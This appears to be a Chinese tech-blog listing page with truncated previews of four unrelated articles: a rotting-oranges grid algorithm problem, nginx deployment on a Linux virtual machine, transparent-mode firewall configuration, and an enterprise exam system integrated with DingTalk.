一、题目描述 在给定的 m x n 网格 grid 中&#xff0c;每个单元格可以有以下三个值之一&#xff1a; 值 0 代表空单元格&#xff1b;值 1 代表新鲜橘子&#xff1b;值 2 代表腐烂的橘子。 每分钟&#xff0c;腐烂的橘子 周围 4 个方向上相邻 的新鲜橘子都会腐烂。 返回 直…

nginx在linux上的部署

第一步、虚拟机安装新建虚拟机&#xff08;创建的时候记得打开网络连接&#xff0c;使用nat转换的方式&#xff09;linux配置上网第一种方式&#xff1a;自动获取&#xff0c;将ipv4设置为dhcp的自动获取。但是这样每次获取的ip可能不一样。使用xshell连接的时候可能需要修改。…

第四十一讲:神州防火墙透明模式的初始配置

现在要求把防火墙接入到现有的局域网中&#xff0c;尽量不改变已有的LAN架构和IP 地址分配&#xff0c;还能对内网的流量管理进行管理&#xff0c;起到对内网的安全保护作用。防火墙接入要求&#xff0c;应该选择防火墙的工作模式为透明模式。透明模式对原有网络的介入最少&…

把PBP、前端对接、钉钉集成玩透的考试系统

文/刘俊良 周亮 年佳斌 编辑/杜逸敏 一、项目背景 客户需要开发一套企业内部的考试系统&#xff0c;用于企业内部规章制度的学习及考核。系统的主要功能包括&#xff1a; 每个员工都可以进行每日答题与专项答题。根据答题结果&#xff0c;归类不同的题库以供员工查询学习。…